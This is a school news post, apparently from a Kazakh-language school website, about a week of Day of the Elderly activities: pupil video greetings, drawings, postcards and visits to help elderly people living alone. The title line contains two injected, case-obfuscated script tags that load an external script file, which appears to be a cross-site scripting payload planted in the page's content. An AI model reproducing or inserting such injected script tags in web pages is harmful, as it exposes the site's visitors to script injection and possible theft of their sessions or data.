Қарттар күніне орай өткізілген іс-шаралар<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.10.2020

Симферополь орта мектебінде қарттар күніне орай 28 қыркұйектен бастап 4 қазан аралығында апта бойы  іс-шаралар өткізілді.  

               1-11 сынып оқушылары арасында челлендж түрінде оқушылардың видео құттықтауы ұйымдастырылды.

                3-6 сынып оқушылары арасында ұйымдастырылып, "Мен және менің үлкен отбасым" тақырыбында суреттер салды.

             Бастауыш сыныптар арасында "Жақсылық поштасы" аясында ашық хаттар дайындалды.

              Мектеп парламенті мүшелерінің атынан аудандық БАҚ құттықтау мақаласы жіберілді.

               Сонымен қатар 5-11 сынып оқушылары арасында қарттарға көмек түрінде Тимуровшылар қозғалысы ұйымдастырылды. Әр сыныптан 3-4 оқушы сынып жетекшісімен бірге жалғыз басты қарттардың үйіне барып, көмек қолдарын ұсынды. Барлығы санитарлық қатаң нормаларды ұстанды.

 

Просмотров: 650


Пікір қосу



Деректерді қолтаңбаға қосу